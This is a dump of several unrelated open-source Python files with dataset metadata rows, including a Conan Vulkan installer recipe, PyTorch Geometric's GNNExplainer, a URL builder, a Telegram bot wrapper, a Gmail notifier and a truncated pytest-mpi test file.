d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 2
|
2019-07-30T20:52:50.000Z
|
2020-06-26T11:00:52.000Z
|
# -*- coding: utf-8 -*-
import os
from conanfile_base import ConanFileBase
class ConanFileInstaller(ConanFileBase):
name = "vulkan_lunarg_installer"
exports = ConanFileBase.exports + ["conanfile_base.py"]
settings = "os_build", "arch_build"
_is_installer = True
def package(self):
if self.settings.os_build == "Windows":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
if self.settings.arch_build == "x86":
bin_folder = os.path.join(base_folder, "Bin32")
tools_folder = os.path.join(base_folder, "Tools32")
elif self.settings.arch_build == "x86_64":
bin_folder = os.path.join(base_folder, "Bin")
tools_folder = os.path.join(base_folder, "Tools")
self.copy(pattern="*.exe", dst="bin", src=bin_folder)
self.copy(pattern="*", dst="bin/tools", src=tools_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Linux":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
bin_folder = os.path.join(base_folder, str(self.settings.arch_build), "bin")
self.copy(pattern="*", dst="bin", src=bin_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Macos":
base_folder = os.path.join(self.build_folder, self._source_subfolder, "macOS")
self.copy(pattern="*", dst="bin", src=os.path.join(base_folder, "bin"))
def package_info(self):
self.cpp_info.bindirs = ["bin"]
if self.settings.os_build == "Windows":
self.cpp_info.bindirs.append("bin/tools")
for bindir in self.cpp_info.bindirs:
bindir_fullpath = os.path.join(self.package_folder, bindir)
self.output.info("Appending PATH environment variable: {}".format(bindir_fullpath))
self.env_info.PATH.append(bindir_fullpath)
| 46.295455
| 95
| 0.63623
| 1,958
| 0.961217
| 0
| 0
| 0
| 0
| 0
| 0
| 324
| 0.159057
|
af2638ff33d3fba5e4671ad6ba6d98342710dd02
| 91
|
py
|
Python
|
models/retinanet/__init__.py
|
lihaojia24/pytorch-dt
|
0a8bda73d2055e960ac4840c651b5dff61bc4f5f
|
[
"MIT"
] | null | null | null |
models/retinanet/__init__.py
|
lihaojia24/pytorch-dt
|
0a8bda73d2055e960ac4840c651b5dff61bc4f5f
|
[
"MIT"
] | null | null | null |
models/retinanet/__init__.py
|
lihaojia24/pytorch-dt
|
0a8bda73d2055e960ac4840c651b5dff61bc4f5f
|
[
"MIT"
] | null | null | null |
from .fpn import FPN50
from .net import RetinaNet
from .box_coder import RetinaBoxCoder
| 22.75
| 38
| 0.802198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af26de8caba6f5f8de41aa4611f62c733084b68c
| 285
|
py
|
Python
|
function/deco.py
|
git-ning/core-python-programming
|
907ad7071c08086636134fde97f432037f1b824b
|
[
"Apache-2.0"
] | null | null | null |
function/deco.py
|
git-ning/core-python-programming
|
907ad7071c08086636134fde97f432037f1b824b
|
[
"Apache-2.0"
] | null | null | null |
function/deco.py
|
git-ning/core-python-programming
|
907ad7071c08086636134fde97f432037f1b824b
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin python
from time import ctime, sleep
def tsfunc (func):
def wrappedFunc():
print '[%s] %s() called' % (ctime(), func.__name__)
return func()
return wrappedFunc
@tsfunc
def foo():
pass
foo()
sleep(4)
for i in range(2):
sleep(1)
foo()
| 14.25
| 59
| 0.582456
| 0
| 0
| 0
| 0
| 27
| 0.094737
| 0
| 0
| 36
| 0.126316
|
af26f7f77af7f12e0aa08bff53add63e6fd4a8b4
| 10,384
|
py
|
Python
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,350
|
2021-09-12T08:32:50.000Z
|
2022-03-31T18:09:36.000Z
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 588
|
2021-09-12T08:49:08.000Z
|
2022-03-31T21:02:13.000Z
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 505
|
2021-09-13T13:13:32.000Z
|
2022-03-31T15:54:00.000Z
|
from math import sqrt
from typing import Optional
import torch
from tqdm import tqdm
from torch_geometric.nn.models.explainer import (
Explainer,
clear_masks,
set_masks,
)
EPS = 1e-15
class GNNExplainer(Explainer):
r"""The GNN-Explainer model from the `"GNNExplainer: Generating
Explanations for Graph Neural Networks"
<https://arxiv.org/abs/1903.03894>`_ paper for identifying compact subgraph
    structures and small subsets of node features that play a crucial role in a
GNN’s node-predictions.
.. note::
For an example of using GNN-Explainer, see `examples/gnn_explainer.py
<https://github.com/pyg-team/pytorch_geometric/blob/master/examples/
gnn_explainer.py>`_.
Args:
model (torch.nn.Module): The GNN module to explain.
epochs (int, optional): The number of epochs to train.
(default: :obj:`100`)
lr (float, optional): The learning rate to apply.
(default: :obj:`0.01`)
num_hops (int, optional): The number of hops the :obj:`model` is
aggregating information from.
If set to :obj:`None`, will automatically try to detect this
information based on the number of
:class:`~torch_geometric.nn.conv.message_passing.MessagePassing`
layers inside :obj:`model`. (default: :obj:`None`)
return_type (str, optional): Denotes the type of output from
:obj:`model`. Valid inputs are :obj:`"log_prob"` (the model
returns the logarithm of probabilities), :obj:`"prob"` (the
model returns probabilities), :obj:`"raw"` (the model returns raw
scores) and :obj:`"regression"` (the model returns scalars).
(default: :obj:`"log_prob"`)
feat_mask_type (str, optional): Denotes the type of feature mask
that will be learned. Valid inputs are :obj:`"feature"` (a single
feature-level mask for all nodes), :obj:`"individual_feature"`
(individual feature-level masks for each node), and :obj:`"scalar"`
            (scalar mask for each node). (default: :obj:`"feature"`)
allow_edge_mask (boolean, optional): If set to :obj:`False`, the edge
mask will not be optimized. (default: :obj:`True`)
log (bool, optional): If set to :obj:`False`, will not log any learning
progress. (default: :obj:`True`)
**kwargs (optional): Additional hyper-parameters to override default
settings in :attr:`~torch_geometric.nn.models.GNNExplainer.coeffs`.
"""
coeffs = {
'edge_size': 0.005,
'edge_reduction': 'sum',
'node_feat_size': 1.0,
'node_feat_reduction': 'mean',
'edge_ent': 1.0,
'node_feat_ent': 0.1,
}
def __init__(self, model, epochs: int = 100, lr: float = 0.01,
num_hops: Optional[int] = None, return_type: str = 'log_prob',
feat_mask_type: str = 'feature', allow_edge_mask: bool = True,
log: bool = True, **kwargs):
super().__init__(model, lr, epochs, num_hops, return_type, log)
assert feat_mask_type in ['feature', 'individual_feature', 'scalar']
self.allow_edge_mask = allow_edge_mask
self.feat_mask_type = feat_mask_type
self.coeffs.update(kwargs)
def _initialize_masks(self, x, edge_index, init="normal"):
(N, F), E = x.size(), edge_index.size(1)
std = 0.1
if self.feat_mask_type == 'individual_feature':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, F) * std)
elif self.feat_mask_type == 'scalar':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, 1) * std)
else:
self.node_feat_mask = torch.nn.Parameter(torch.randn(1, F) * std)
std = torch.nn.init.calculate_gain('relu') * sqrt(2.0 / (2 * N))
if self.allow_edge_mask:
self.edge_mask = torch.nn.Parameter(torch.randn(E) * std)
def _clear_masks(self):
clear_masks(self.model)
self.node_feat_masks = None
self.edge_mask = None
def _loss(self, log_logits, prediction, node_idx: Optional[int] = None):
if self.return_type == 'regression':
if node_idx is not None and node_idx >= 0:
loss = torch.cdist(log_logits[node_idx], prediction[node_idx])
else:
loss = torch.cdist(log_logits, prediction)
else:
if node_idx is not None and node_idx >= 0:
loss = -log_logits[node_idx, prediction[node_idx]]
else:
loss = -log_logits[0, prediction[0]]
if self.allow_edge_mask:
m = self.edge_mask.sigmoid()
edge_reduce = getattr(torch, self.coeffs['edge_reduction'])
loss = loss + self.coeffs['edge_size'] * edge_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['edge_ent'] * ent.mean()
m = self.node_feat_mask.sigmoid()
node_feat_reduce = getattr(torch, self.coeffs['node_feat_reduction'])
loss = loss + self.coeffs['node_feat_size'] * node_feat_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['node_feat_ent'] * ent.mean()
return loss
def explain_graph(self, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for a graph.
Args:
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
# all nodes belong to same graph
batch = torch.zeros(x.shape[0], dtype=int, device=x.device)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, batch=batch,
**kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description('Explain graph')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, batch=batch, **kwargs)
loss = self.get_loss(out, prediction, None)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid().squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.ones(edge_index.size(1))
self._clear_masks()
return node_feat_mask, edge_mask
def explain_node(self, node_idx, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for node
:attr:`node_idx`.
Args:
node_idx (int): The node to explain.
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
num_nodes = x.size(0)
num_edges = edge_index.size(1)
# Only operate on a k-hop subgraph around `node_idx`.
x, edge_index, mapping, hard_edge_mask, subset, kwargs = \
self.subgraph(node_idx, x, edge_index, **kwargs)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, **kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description(f'Explain node {node_idx}')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, **kwargs)
loss = self.get_loss(out, prediction, mapping)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid()
if self.feat_mask_type == 'individual_feature':
new_mask = x.new_zeros(num_nodes, x.size(-1))
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
elif self.feat_mask_type == 'scalar':
new_mask = x.new_zeros(num_nodes, 1)
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
node_feat_mask = node_feat_mask.squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.new_zeros(num_edges)
edge_mask[hard_edge_mask] = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.zeros(num_edges)
edge_mask[hard_edge_mask] = 1
self._clear_masks()
return node_feat_mask, edge_mask
def __repr__(self):
return f'{self.__class__.__name__}()'
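# Usage sketch (hedged; `model`, `x` and `edge_index` are assumed to come from the
# user's own graph and GNN setup):
# explainer = GNNExplainer(model, epochs=200, return_type='log_prob')
# node_feat_mask, edge_mask = explainer.explain_node(node_idx=10, x=x, edge_index=edge_index)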
| 39.037594
| 79
| 0.600443
| 10,184
| 0.980551
| 0
| 0
| 0
| 0
| 0
| 0
| 3,886
| 0.374158
|
af277517a9ae94e0e93ae316044261745639cbc5
| 381
|
py
|
Python
|
australia.py/real para dolar.py
|
Godofcoffe/Australia
|
9d33e5f96dac99e670887d51411476a1220e43af
|
[
"MIT"
] | null | null | null |
australia.py/real para dolar.py
|
Godofcoffe/Australia
|
9d33e5f96dac99e670887d51411476a1220e43af
|
[
"MIT"
] | null | null | null |
australia.py/real para dolar.py
|
Godofcoffe/Australia
|
9d33e5f96dac99e670887d51411476a1220e43af
|
[
"MIT"
] | null | null | null |
try:
real = float(input('R$:'))
except ValueError:
print(f'Digite uma quantia valida.')
real = float(input('R$:'))
while len(str(real)) > 5:
print('Quantia não reconhecida, digite novamente com "." para separar os centavos')
real = float(input('R$:'))
print(f'Voce pode comprar {real/5.55:.2f} dolares')
print(f'E pode comprar tambem {real/6.56:.2f} euros')
| 29.307692
| 88
| 0.650919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 212
| 0.554974
|
af2a14c5a1ecce93ffbb2b29cf3a4a7b86e5ec05
| 6,482
|
py
|
Python
|
urlazy.py
|
i-trofimtschuk/urlazy
|
bdd6b3fd817f49ec35f590a7b01bb93ce290019a
|
[
"Unlicense"
] | 1
|
2021-02-02T13:33:46.000Z
|
2021-02-02T13:33:46.000Z
|
urlazy.py
|
i-trofimtschuk/urlazy
|
bdd6b3fd817f49ec35f590a7b01bb93ce290019a
|
[
"Unlicense"
] | null | null | null |
urlazy.py
|
i-trofimtschuk/urlazy
|
bdd6b3fd817f49ec35f590a7b01bb93ce290019a
|
[
"Unlicense"
] | null | null | null |
from __future__ import annotations
from dataclasses import dataclass, field
from typing import List, Tuple, Union
from urllib.parse import ParseResult, urlencode
__version__ = '0.0.1.dev'
Query = List[Tuple[str, str]]
Path = List[str]
@dataclass()
class URL:
"""Build URLs incrementally
# one way
>>> url = HTTPS() // 'www.youtube.com'
>>> video_id = 'dQw4w9WgXcQ'
>>> tracking = {'utm_campaign': 'utmc', 'utm_source': 'utms', 'utm_medium': 'utmm'}
>>> if video_id:
... url /= 'watch'
... url &= {'v': video_id}
>>> if tracking:
... url &= tracking
>>> url.geturl()
'https://www.youtube.com/watch?v=dQw4w9WgXcQ&utm_campaign=utmc&utm_source=utms&utm_medium=utmm'
# another way
>>> url = URL().https()
>>> url.hostname('www.youtube.com')
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=[], _query=[], _fragment='')
>>> video_id = 'dQw4w9WgXcQ'
>>> tracking = {'utm_campaign': 'utmc', 'utm_source': 'utms', 'utm_medium': 'utmm'}
>>> if video_id:
... url.path('watch')
... url.query({'v': video_id})
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=['watch'], _query=[], _fragment='')
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=['watch'], _query=[('v', 'dQw4w9WgXcQ')], _fragment='')
>>> if tracking:
... url.query(tracking)
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=['watch'], _query=[('v', 'dQw4w9WgXcQ'), ('utm_campaign', 'utmc'), ('utm_source', 'utms'), ('utm_medium', 'utmm')], _fragment='')
>>> url.geturl()
'https://www.youtube.com/watch?v=dQw4w9WgXcQ&utm_campaign=utmc&utm_source=utms&utm_medium=utmm'
# other examples
>>> (HTTPS() // 'www.youtube.com' / 'watch' & {'v': 'dQw4w9WgXcQ'}).url
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
>>> (URL.https().hostname('www.youtube.com').path('watch').query({'v': 'dQw4w9WgXcQ'})).url
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
>>> (HTTPS() // URL().hostname('www.youtube.com') / URL().path('watch') & URL().query({'v': 'dQw4w9WgXcQ'}) | URL().fragment('fragment')).url
'https://www.youtube.com/watch?v=dQw4w9WgXcQ#fragment'
>>> (HTTPS() // 'www.youtube.com' / 'path1' / 'path2' / '' & [('a', 1), ('b', 2)] & [('a', 3)] | 'fragment' | '-more-fragment').url
'https://www.youtube.com/path1/path2/?a=1&b=2&a=3#fragment-more-fragment'
>>> (URL.https().username('user').password('pwd').hostname('www.youtube.com').port(443).path('/').query([('a', 1), ('b', 2)]).query([('a', 3)]).fragment('fragment').fragment('-more-fragment')).url
'https://user:pwd@www.youtube.com:443/?a=1&b=2&a=3#fragment-more-fragment'
"""
_scheme: str = ''
_username: str = ''
_password: str = ''
_hostname: str = ''
_port: str = ''
_path: Path = field(default_factory=list)
_query: Query = field(default_factory=list)
_fragment: str = ''
@staticmethod
def http() -> URL:
return URL().scheme('http')
@staticmethod
def https() -> URL:
return URL().scheme('https')
def scheme(self, scheme: str) -> URL:
self._scheme = scheme
return self
def username(self, username: str) -> URL:
self._username = username
return self
def password(self, password: str) -> URL:
self._password = password
return self
def hostname(self, hostname: str) -> URL:
self._hostname = hostname
return self
def port(self, port: Union[int, str]) -> URL:
self._port = str(port)
return self
@property
def _netloc(self) -> str:
netloc = ''
if self._username:
if self._password:
netloc += f'{self._username}:{self._password}@'
else:
netloc += f'{self._username}@'
netloc += self._hostname
if self._port:
netloc += f':{self._port}'
return netloc
def path(self, path: str) -> URL:
self._path.append(path)
return self
def query(self, query: Union[Query, dict]) -> URL:
if isinstance(query, dict):
self._query.extend(query.items())
else:
self._query.extend(query)
return self
def fragment(self, fragment: str) -> URL:
self._fragment += fragment
return self
def geturl(self) -> str:
return self.parse_result.geturl()
def __str__(self):
return self.geturl()
@property
def url(self) -> str:
return self.geturl()
@property
def parse_result(self) -> ParseResult:
return ParseResult(
scheme=self._scheme,
netloc=self._netloc,
path='/'.join(self._path),
params='',
query=urlencode(self._query),
fragment=self._fragment)
def __floordiv__(self, other: Union[URL, str]) -> URL:
if isinstance(other, URL):
self._username = other._username
self._password = other._password
self._hostname = other._hostname
self._port = other._port
else:
if '@' in other:
auth, _, host_port = other.partition('@')
if ':' in auth:
self._username, self._password = auth.split(':', 1)
else:
self._username, self._password = auth, ''
else:
host_port = other
if ':' in host_port:
self._hostname, self._port = host_port.split(':', 1)
else:
self._hostname, self._port = host_port, ''
return self
def __truediv__(self, other: Union[URL, str]) -> URL:
if isinstance(other, URL):
self._path.extend(other._path)
return self
return self.path(other)
def __and__(self, other: Union[URL, dict]) -> URL:
if isinstance(other, URL):
self._query.extend(other._query)
return self
return self.query(other)
def __or__(self, other: Union[URL, str]) -> URL:
if isinstance(other, URL):
return self.fragment(other._fragment)
return self.fragment(other)
HTTP = URL.http
HTTPS = URL.https
if __name__ == "__main__":
import doctest
doctest.testmod()
| 31.619512
| 227
| 0.568343
| 6,123
| 0.944616
| 0
| 0
| 6,136
| 0.946621
| 0
| 0
| 2,739
| 0.422555
|
af2bf330f5c58cef255d60fd7059e9b558223019
| 552
|
py
|
Python
|
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.forms import AuthenticationForm
def customize_admin():
admin.site.site_header = 'Feature Request Tracker'
admin.site.site_title = 'Freq'
admin.site.index_title = 'Track Feature Requests with Freq'
admin.site.site_url = None
# allow non-staff users to access admin views
def is_user_active(request):
return request.user.is_active
admin.site.has_permission = is_user_active
# allow non-staff users to log in
admin.site.login_form = AuthenticationForm
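# Usage note (an assumption, not shown in this file): customize_admin() would typically be
# called once at startup, e.g. from an AppConfig.ready() hook or the project's urls.py,
# before the admin site is served.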
| 32.470588
| 63
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 143
| 0.259058
|
af2ded2bcaaf00693925512eeea11c00ded8df3d
| 3,842
|
py
|
Python
|
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
import logging
from dataclasses import dataclass
import TelegramBot.lib_requests as lib_requests
import CustomLogger
@dataclass
class MessageData:
last_message: str
chatroom_id: str
sender_id: str
sender_name: str
@property
def command(self):
if not self.last_message[:1] == "/":
return
if "@" in self.last_message:
return self.last_message.split("@")[0]
elif " " in self.last_message:
return self.last_message.split(" ")[0]
else:
return self.last_message
class TelegramError(Exception):
def __init__(self, text: str, chatroom_id: str = 0):
        self.text = text
self.chatroom_id = chatroom_id
class TelegramBot:
def __init__(self, bot_token: str,
logger: logging.Logger = None):
"""
:param bot_token:
:param logger:
"""
self.bot_token = bot_token
self.url = "https://api.telegram.org/bot" + self.bot_token
self.update_id = 0
self.logger = logger if logger else CustomLogger.getLogger()
def request_bot_info(self) -> dict:
"""Request Bot Info"""
result = lib_requests.http_request(self.url + "/getMe")
if not result["result"]["username"]:
raise TelegramError('Missing data result["result"]["username"]')
self.logger.debug(f"Request Bot Info: {result}")
return result["result"]["username"]
def send_text(self, message: str, chatroom_id: str) -> None:
"""Send Text Message"""
params = {"chat_id": chatroom_id, "text": message}
result = lib_requests.http_request(self.url + "/sendMessage", params)
if not result["ok"]:
raise TelegramError(f"Error sending Text Message: {message} to Chatroom{chatroom_id}")
self.logger.debug(f"Send Text Message: {message} to Chatroom {chatroom_id}")
def send_photo(self, file: bytes, chatroom_id: str) -> None:
if not file:
raise TelegramError(f"Got not bytes Object to send a photo.")
# send file to chat
params = {"chat_id": chatroom_id}
payload = {"photo": file}
result = lib_requests.http_request(self.url + "/sendPhoto", params, payload)
if not result["ok"]:
self.send_text(result["description"], chatroom_id)
raise TelegramError(f"Error sending Photo to Chatroom: {chatroom_id} Response: {result}")
self.logger.debug(f"Send Photo to chat: {chatroom_id}")
def request_message(self) -> MessageData:
"""
Request Last messages.
:return:
"""
params = {"offset": self.update_id + 1}
response = lib_requests.http_request(self.url + "/getUpdates", params)
if not response["ok"]:
raise TelegramError(f"Failure in Response: {response}")
if len(response["result"]) == 0:
return
# store messages to list of MessageData
message = response["result"][0]
self.logger.debug(f"Got message: {message}")
# store last update ID for requesting just newer Messages
self.update_id = message["update_id"]
if "message" not in message.keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
if "text" not in message["message"].keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
return MessageData(last_message=str(message["message"]["text"]),
chatroom_id=str(message["message"]["chat"]["id"]),
sender_id=str(message["message"]["from"]["id"]),
sender_name=str(message["message"]["from"]["first_name"])
)
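# Minimal usage sketch (hedged; the token and message text are placeholders):
# bot = TelegramBot(bot_token="123456:ABC-DEF")
# print(bot.request_bot_info())
# msg = bot.request_message()
# if msg is not None and msg.command == "/start":
#     bot.send_text("hello", msg.chatroom_id)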
| 35.574074
| 110
| 0.60151
| 3,703
| 0.963821
| 0
| 0
| 443
| 0.115305
| 0
| 0
| 1,108
| 0.288391
|
af2f99ce0b83f78345650ccae1cccf6756b809c0
| 555
|
py
|
Python
|
test.py
|
BLovegrove/CPR-Tools
|
0dda4409410c5b2c47a913ac611e53870ef33cf7
|
[
"Apache-2.0"
] | 2
|
2022-01-30T07:29:04.000Z
|
2022-01-31T02:42:37.000Z
|
test.py
|
BLovegrove/cpr-tools
|
0dda4409410c5b2c47a913ac611e53870ef33cf7
|
[
"Apache-2.0"
] | 1
|
2022-02-13T21:46:44.000Z
|
2022-02-14T20:38:31.000Z
|
test.py
|
BLovegrove/cpr-tools
|
0dda4409410c5b2c47a913ac611e53870ef33cf7
|
[
"Apache-2.0"
] | null | null | null |
import pyautogui as pgui
pgui.PAUSE = 0
def apply_sauce():
sauce_pos = (365, 548)
pizza_pos = (968, 638)
pgui.moveTo(sauce_pos[0], sauce_pos[1])
# pgui.mouseDown()
print("mouse down")
pgui.moveTo(pizza_pos[0], pizza_pos[1])
speed = 0.11
drift = 50
for i in range(3):
pgui.moveTo(pizza_pos[0] - (i * drift), pizza_pos[1] + 230, speed)
pgui.moveTo(pizza_pos[0] - (i * drift), pizza_pos[1], speed)
# pgui.mouseUp()
print("mouse up")
return
apply_sauce()
| 20.555556
| 74
| 0.565766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.100901
|
af2fe4de9eede3a49c06c050ed3b255d1c2f19b7
| 2,275
|
py
|
Python
|
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Notifies subscribers of new articles."""
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class Email:
"""Formats email content as a MIME message."""
def __init__(self, sender, receiver, subject, content, use_html=False):
self.sender = str(sender)
self.receiver = receiver
self.subject = subject
self.content = content
if use_html:
self.email = MIMEMultipart("alternative")
else:
self.email = MIMEMultipart()
self.email["Subject"] = self.subject
self.email["From"] = self.sender
self.email["To"] = self.receiver
if use_html:
body = MIMEText(content, "html")
else:
body = MIMEText(content, "plain")
self.email.attach(body)
def __repr__(self):
"""Converts MIME email to sendable format."""
return self.email.as_string()
def change_receiver(self, receiver):
"""Modify email recipient so we can resend to additional users."""
self.receiver = receiver
self.email["To"] = self.receiver
return
class GmailSender:
"""Sends email through Gmail account."""
def __init__(self, user, pwd):
self.user = user
self.server = smtplib.SMTP("smtp.gmail.com:587")
self.server.starttls()
self.server.login(self.user, pwd)
def send_email(self, email):
self.server.sendmail(str(email.sender),
str(email.receiver),
str(email))
return
def __repr__(self):
return self.user
def __del__(self):
return self.server.quit()
class Notifier:
"""Notifies subscribers of content through GmailSender."""
def __init__(self, subscribers, user, pwd):
self.user = user
self.sender = GmailSender(user, pwd)
self.subscribers = subscribers
def mail_subscribers(self, email):
for subscriber in self.subscribers:
email.change_receiver(subscriber)
self.sender.send_email(email)
return
def __repr__(self):
return repr(self.sender)
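# Minimal usage sketch (hedged; addresses and credentials are placeholders):
# email = Email("bot@example.com", "", "New article", "<p>Hi!</p>", use_html=True)
# notifier = Notifier(["reader@example.com"], "bot@example.com", "app-password")
# notifier.mail_subscribers(email)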
def main():
return
if __name__ == "__main__":
main()
| 27.409639
| 75
| 0.607473
| 2,037
| 0.895385
| 0
| 0
| 0
| 0
| 0
| 0
| 398
| 0.174945
|
af304f834ba45b345b4105da4802d1c8a9c5c35b
| 296
|
py
|
Python
|
project/common/regular.py
|
mizxc/kispower
|
38d88c4c5a983a90009cb8c7012cb4295b1aec06
|
[
"MIT"
] | 12
|
2020-03-12T08:13:52.000Z
|
2022-01-19T05:27:35.000Z
|
project/common/regular.py
|
kqqian/kispower
|
38d88c4c5a983a90009cb8c7012cb4295b1aec06
|
[
"MIT"
] | 4
|
2020-07-18T05:07:52.000Z
|
2022-01-13T02:21:58.000Z
|
project/common/regular.py
|
kqqian/kispower
|
38d88c4c5a983a90009cb8c7012cb4295b1aec06
|
[
"MIT"
] | 3
|
2020-04-30T02:49:25.000Z
|
2022-01-19T05:27:38.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019-12-22
# @Author : mizxc
# @Email : xiangxianjiao@163.com
import re
def reEmail(str):
    # use alternation for the TLD: a character class like [com,cn,net] only matches single characters
    return re.match(r'^[0-9a-zA-Z_]{0,19}@[0-9a-zA-Z]{1,13}\.(com|cn|net)$', str)
if __name__ == '__main__':
print (reEmail(''))
print (len('12222'))
| 21.142857
| 86
| 0.564189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.597973
|
af3189d1de387336103e54ce753d23af15e912bb
| 2,615
|
py
|
Python
|
tests/test_markers.py
|
opoplawski/pytest-mpi
|
9ad369af744a47cedf5025245f051e793703c748
|
[
"BSD-3-Clause"
] | 9
|
2019-07-12T11:31:29.000Z
|
2022-03-11T19:31:17.000Z
|
tests/test_markers.py
|
opoplawski/pytest-mpi
|
9ad369af744a47cedf5025245f051e793703c748
|
[
"BSD-3-Clause"
] | 38
|
2019-12-18T05:08:39.000Z
|
2022-03-25T02:45:00.000Z
|
tests/test_markers.py
|
opoplawski/pytest-mpi
|
9ad369af744a47cedf5025245f051e793703c748
|
[
"BSD-3-Clause"
] | 6
|
2020-05-10T23:37:19.000Z
|
2022-03-21T13:34:22.000Z
|
from pytest_mpi._helpers import _fix_plural
MPI_TEST_CODE = """
import pytest
@pytest.mark.mpi
def test_size():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size > 0
@pytest.mark.mpi(min_size=2)
def test_size_min_2():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size >= 2
@pytest.mark.mpi(min_size=4)
def test_size_min_4():
from mpi4py import MPI
comm = MPI.COMM_WORLD
